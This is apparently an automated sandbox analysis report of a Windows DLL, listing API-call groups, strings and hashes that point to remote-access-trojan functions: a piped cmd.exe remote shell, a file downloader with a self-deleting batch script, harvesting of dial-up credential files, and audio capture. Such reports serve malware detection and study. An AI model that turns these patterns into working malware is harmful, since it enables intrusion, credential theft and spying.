                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$ErrorLast$LibraryLoad
                                                                                              • String ID: connect$getsockname$recv$select$socket$ws2_32.dll
                                                                                              • API String ID: 1969025732-1466708075
                                                                                              • Opcode ID: 4869f2540624f0de57036062d3a6f7b94b0a05a06f79d3c308fa5c7f5636398a
                                                                                              • Instruction ID: 9eea021e2679a54889db195b2b8dea17cea3e2387c884d07e69dbabe29e95218
                                                                                              • Opcode Fuzzy Hash: 4869f2540624f0de57036062d3a6f7b94b0a05a06f79d3c308fa5c7f5636398a
                                                                                              • Instruction Fuzzy Hash: EB716E716083419BE310DF64C884A5FBBE5FFC8354F108A2EF58987290E775D845CB66
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(wininet.dll), ref: 100047A3
                                                                                              • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 100047C1
                                                                                              • GetProcAddress.KERNEL32(00000000,InternetConnectA), ref: 100047CB
                                                                                              • GetProcAddress.KERNEL32(00000000,HttpOpenRequestA), ref: 100047D7
                                                                                              • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 100047E3
                                                                                              • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 100047EF
                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 100047FB
                                                                                              • printf.MSVCRT ref: 100048EB
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 1000491A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$FreeLoadprintf
                                                                                              • String ID: HTTP/1.1$Hackeroo$HttpOpenRequestA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetOpenA$InternetReadFile$wininet.dll
                                                                                              • API String ID: 2425834421-3882969375
                                                                                              • Opcode ID: ab2da8832e121b78344de6fdb46b171ab1ca8c0203973e7725e5a9d28d361bfa
                                                                                              • Instruction ID: 681ed2cf8dfbe48c2289dcdc3772bf4013358cff2fe0b36028245d622f2c89cd
                                                                                              • Opcode Fuzzy Hash: ab2da8832e121b78344de6fdb46b171ab1ca8c0203973e7725e5a9d28d361bfa
                                                                                              • Instruction Fuzzy Hash: 1E41D271504344ABE220DF658C44FAFBBE8EBC5B50F40491DF68567180DBB8E9048B9A
                                                                                              APIs
                                                                                              • TerminateThread.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 10011277
                                                                                              • Sleep.KERNEL32(00000001,?,?,?,10009D95,?), ref: 10011281
                                                                                              • TerminateProcess.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 10011289
                                                                                              • TerminateThread.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 10011295
                                                                                              • Sleep.KERNEL32(00000001,?,?,?,10009D95,?), ref: 10011299
                                                                                              • WaitForSingleObject.KERNEL32(?,000007D0,?,?,?,10009D95,?), ref: 100112A4
                                                                                              • TerminateThread.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 100112B0
                                                                                              • Sleep.KERNEL32(00000001,?,?,?,10009D95,?), ref: 100112B4
                                                                                              • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112C4
                                                                                              • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112CE
                                                                                              • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112D8
                                                                                              • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112E2
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 100112EE
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 100112F4
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 100112FA
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011300
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011306
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 1001130C
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011312
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011318
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$DisconnectNamedPipeTerminate$SleepThread$ObjectProcessSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 3528565692-0
                                                                                              • Opcode ID: e2462b9e51b2cd782e0542687645bfdbb219e5ad88ab8734fd4dc33a84b79df5
                                                                                              • Instruction ID: 9c54264b77c618bb7f3ff833bc2f4ed521a7b34ae7468bb6bf74d3fa9e72dd85
                                                                                              • Opcode Fuzzy Hash: e2462b9e51b2cd782e0542687645bfdbb219e5ad88ab8734fd4dc33a84b79df5
                                                                                              • Instruction Fuzzy Hash: 3921DA71600744ABD624EBBACC84F5BF3EDAF98750F014A0DF246D76A0CAB4F8419E60
                                                                                              APIs
                                                                                              • strrchr.MSVCRT ref: 10008139
                                                                                              • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?), ref: 1000816D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Openstrrchr
                                                                                              • String ID: "%1$%s\shell\open\command$D
                                                                                              • API String ID: 1564636448-1634606264
                                                                                              • Opcode ID: 2cf8cfa4d3311e3e4da36e51a929757a0acaa25937306c6d2d5e068f66906cb7
                                                                                              • Instruction ID: ab82aeec8821551b8da03e6dabbe2dd6c64f2c5119572b537ef325ac62f7637e
                                                                                              • Opcode Fuzzy Hash: 2cf8cfa4d3311e3e4da36e51a929757a0acaa25937306c6d2d5e068f66906cb7
                                                                                              • Instruction Fuzzy Hash: 13419572108345ABE714CB60DC80FABB7EDFBC4345F004C1DF69497250D675AA49C762
                                                                                              APIs
                                                                                                • Part of subcall function 1000D1D0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,1000C45E,?,76F923A0,00000000,100026B5,?,?,00000000,?,?), ref: 1000D1EE
                                                                                              • CreatePipe.KERNEL32 ref: 1001108D
                                                                                              • CloseHandle.KERNEL32(?), ref: 100110A4
                                                                                              • CloseHandle.KERNEL32(?), ref: 100110B1
                                                                                              • CreatePipe.KERNEL32(00001F58,00001F54,00001F50,00000000), ref: 100110C4
                                                                                              • CloseHandle.KERNEL32(?), ref: 100110DB
                                                                                              • CloseHandle.KERNEL32(?), ref: 100110E8
                                                                                              • GetStartupInfoA.KERNEL32(0000000C), ref: 10011111
                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 10011148
                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?), ref: 10011199
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111AD
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111B3
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111B9
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111BE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$Create$Pipe$DirectoryEventInfoProcessStartupSystem
                                                                                              • String ID: D$\cmd.exe
                                                                                              • API String ID: 1868129719-520541716
                                                                                              • Opcode ID: dd8b29a44c76f5e59cb4cd19e233df8ee08fd2a2694a344ceaa59677d3bb7f86
                                                                                              • Instruction ID: 21a73dd738c10b035e80e71e0c9392a4d89bcda19f6c107ece9e955ff4ea587f
                                                                                              • Opcode Fuzzy Hash: dd8b29a44c76f5e59cb4cd19e233df8ee08fd2a2694a344ceaa59677d3bb7f86
                                                                                              • Instruction Fuzzy Hash: 0271AF71604745AFE714CF25CC81B9BBBE5EFC8B00F104A2EF655AB290D7B4E8448B96
                                                                                              APIs
                                                                                              • sprintf.MSVCRT ref: 10006B8F
                                                                                              • sprintf.MSVCRT ref: 10006BD7
                                                                                              • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 10006BEF
                                                                                              • Sleep.KERNEL32(00000064,00000000,?,?,00000000,00000000), ref: 10006BF6
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 10006C08
                                                                                              • Sleep.KERNEL32(000493E0), ref: 10006C38
                                                                                              • CreateFileA.KERNEL32(C:\Del.bat,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 10006C72
                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10006C92
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10006C99
                                                                                              • WinExec.KERNEL32(C:\Del.bat,00000000), ref: 10006CA6
                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 10006CBF
                                                                                                • Part of subcall function 100067F0: GetInputState.USER32 ref: 100067F3
                                                                                                • Part of subcall function 100067F0: GetCurrentThreadId.KERNEL32 ref: 100067FF
                                                                                                • Part of subcall function 100067F0: PostThreadMessageA.USER32(00000000), ref: 10006806
                                                                                                • Part of subcall function 100067F0: GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10006817
                                                                                                • Part of subcall function 100040D0: GetTickCount.KERNEL32 ref: 100040D1
                                                                                                • Part of subcall function 100040D0: rand.MSVCRT ref: 100040D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Thread$File$ExitMessageSleepUsersprintf$CloseCountCreateCurrentDownloadExecHandleInputPostStateTickWriterand
                                                                                              • String ID: %s?abc=%d%d%d%d$C:\Del.bat$C:\WINDOWS\TEMP\%d%d%d%d.ccc$Del c:\windows\temp\**.cccDel %0
                                                                                              • API String ID: 1802622305-1970547419
                                                                                              • Opcode ID: 5d690c170f66fd898cb5acb4569625737ab5efa727c2d913b09523f43e067e74
                                                                                              • Instruction ID: a99f9cc9cae1f12021b554281c88dee9c3d8dd1fd31d28a6ceb09f359c56c71a
                                                                                              • Opcode Fuzzy Hash: 5d690c170f66fd898cb5acb4569625737ab5efa727c2d913b09523f43e067e74
                                                                                              • Instruction Fuzzy Hash: EC4105B26403413EF210DBA4DC42FB7779AEB85744F110438F78AAA2C1DAB579498667
                                                                                              APIs
                                                                                              • GetWindowsDirectoryA.KERNEL32 ref: 10006F5E
                                                                                              • strchr.MSVCRT ref: 10006F70
                                                                                              • lstrcpy.KERNEL32(00000001), ref: 10006F7B
                                                                                              • lstrcat.KERNEL32(?,?), ref: 10006F90
                                                                                              • lstrcat.KERNEL32(?,\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk), ref: 10006F9C
                                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 10006FAC
                                                                                              • wsprintfA.USER32 ref: 10006FCC
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00001000), ref: 10006FEA
                                                                                              • GetPrivateProfileSectionNamesA.KERNEL32(00000000,00001000,00000400), ref: 10007015
                                                                                              • lstrlen.KERNEL32(00000000), ref: 1000702D
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000704B
                                                                                              Strings
                                                                                              • \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 10006F96
                                                                                              • Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 10006FB9
                                                                                              • %s//%s, xrefs: 10006FC6
                                                                                              • Documents and Settings\, xrefs: 10006F64
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrcat$??2@??3@DirectoryFolderNamesPathPrivateProfileSectionSpecialWindowslstrcpylstrlenstrchrwsprintf
                                                                                              • String ID: %s//%s$Documents and Settings\$Microsoft\Network\Connections\pbk\rasphone.pbk$\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
                                                                                              • API String ID: 1834765725-145037316
                                                                                              • Opcode ID: 79a34f43d602c1009b597179ffdf5f7e60e5cfccbe8278ec635163b31d8a3950
                                                                                              • Instruction ID: 9755ad88c6a7c2de1a7a09f9197344cb42d28d28b3bab84a9660466105d068a3
                                                                                              • Opcode Fuzzy Hash: 79a34f43d602c1009b597179ffdf5f7e60e5cfccbe8278ec635163b31d8a3950
                                                                                              • Instruction Fuzzy Hash: 3C31A1B1504395AFE710DF60DC88F9BB7E9FB89705F04091CF68597240E679EA09CBA2
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000001C,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007840
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007883
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007897
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100078DD
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100078F1
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007937
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 1000794B
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007991
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100079A5
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100079EB
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100079FF
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 10007A58
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,?), ref: 10007A6C
                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?), ref: 10007AB1
                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,?), ref: 10007AC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$??3@
                                                                                              • String ID:
                                                                                              • API String ID: 1245774677-0
                                                                                              • Opcode ID: efc4adb11d259ce337aa2f88174ac1102378eaacc0aa5d6b11d5639599dfff2b
                                                                                              • Instruction ID: ecb620a65a387641466dd8f5cfd537940ff52a14495c8058afc9bdc292101b4f
                                                                                              • Opcode Fuzzy Hash: efc4adb11d259ce337aa2f88174ac1102378eaacc0aa5d6b11d5639599dfff2b
                                                                                              • Instruction Fuzzy Hash: BCC1BCBAB042054BE718CE39C89296B77D6FB882A0B15862CFD1A873C1DF75ED05C791
                                                                                              APIs
                                                                                                • Part of subcall function 1000D900: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C
                                                                                              • lstrlen.KERNEL32(?), ref: 10009365
                                                                                              • lstrcat.KERNEL32(?,rar.exe), ref: 100093A1
                                                                                              • lstrcpy.KERNEL32(?,?), ref: 100093B2
                                                                                              • PathRemoveFileSpecA.SHLWAPI(?), ref: 100093BC
                                                                                              • lstrcpy.KERNEL32(?,?), ref: 100093C8
                                                                                              • PathRemoveExtensionA.SHLWAPI(?), ref: 100093CF
                                                                                              • lstrcat.KERNEL32(?,1007A0CC), ref: 100093DF
                                                                                              • wsprintfA.USER32 ref: 100093F4
                                                                                              • ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000), ref: 10009418
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PathRemovelstrcatlstrcpy$ExecuteExtensionFileOpenShellSpeclstrlenwsprintf
                                                                                              • String ID: WinRAR\shell\open\command$open$rar.exe$x %s %s
                                                                                              • API String ID: 1763624715-2921234164
                                                                                              • Opcode ID: ad5e5701b212f8edd3ead078ccd65cb98e6fd0e360b7cda8834bb0ad263879bd
                                                                                              • Instruction ID: a81b6a790fa88baee27cdb696a84ad45282978667647cc58660b41da7713e94e
                                                                                              • Opcode Fuzzy Hash: ad5e5701b212f8edd3ead078ccd65cb98e6fd0e360b7cda8834bb0ad263879bd
                                                                                              • Instruction Fuzzy Hash: 6D3195B6104399AFE730DB64CC94FEB77AEEBC8304F00891CF68597141DA756A05CB62
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strchrstrncpy$atoi
                                                                                              • String ID:
                                                                                              • API String ID: 3940265933-0
                                                                                              • Opcode ID: 7e5e4238010ca1327608cdc8460cd83de5e126a4c912968ad0552fe01382e086
                                                                                              • Instruction ID: 21ca36c069230d07eea7d776a96db384ee496568b4fed2c6a8f6547b2fdee8a7
                                                                                              • Opcode Fuzzy Hash: 7e5e4238010ca1327608cdc8460cd83de5e126a4c912968ad0552fe01382e086
                                                                                              • Instruction Fuzzy Hash: 6591F8329002595BD728CB75CC45AEFB7A5FF88360F10436AF91AA32D0DEB49F45CA94
                                                                                              APIs
                                                                                              • waveInStop.WINMM(?,?,?,?,?,10002D08), ref: 10002D37
                                                                                              • waveInReset.WINMM(?,?,?,?,?,10002D08), ref: 10002D41
                                                                                              • waveInUnprepareHeader.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002D5E
                                                                                              • waveInClose.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002D6A
                                                                                              • TerminateThread.KERNEL32(?,000000FF,?,00000020,?,?,?,?,10002D08), ref: 10002D76
                                                                                              • waveOutReset.WINMM(?,?,?,?,?,10002D08), ref: 10002D87
                                                                                              • waveOutUnprepareHeader.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002DA4
                                                                                              • waveOutClose.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002DB0
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,10002D08), ref: 10002DC2
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,10002D08), ref: 10002DCA
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,10002D08), ref: 10002DD3
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,10002D08), ref: 10002DDC
                                                                                              • CloseHandle.KERNEL32(?), ref: 10002DF4
                                                                                              • CloseHandle.KERNEL32(?), ref: 10002DFA
                                                                                              • CloseHandle.KERNEL32(?), ref: 10002E00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wave$Close$??3@$Handle$HeaderResetUnprepare$StopTerminateThread
                                                                                              • String ID:
                                                                                              • API String ID: 3312516386-0
                                                                                              • Opcode ID: d3448f76e52faa917ff72099c3d4ae32099888250af06bce9c62b5df9f15304b
                                                                                              • Instruction ID: f53181e0cb89491cd7c99ff78531d68b368b4d0a2bb5ae7883e750d4989dc1ff
                                                                                              • Opcode Fuzzy Hash: d3448f76e52faa917ff72099c3d4ae32099888250af06bce9c62b5df9f15304b
                                                                                              • Instruction Fuzzy Hash: 82214DB62107519FE620DB71CC88967B3BEFF8C350B014A09E69247755EB75FC458B60
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 10002827
                                                                                              • LoadIconA.USER32 ref: 1000285E
                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 1000286F
                                                                                              • RegisterClassExA.USER32(?), ref: 1000288E
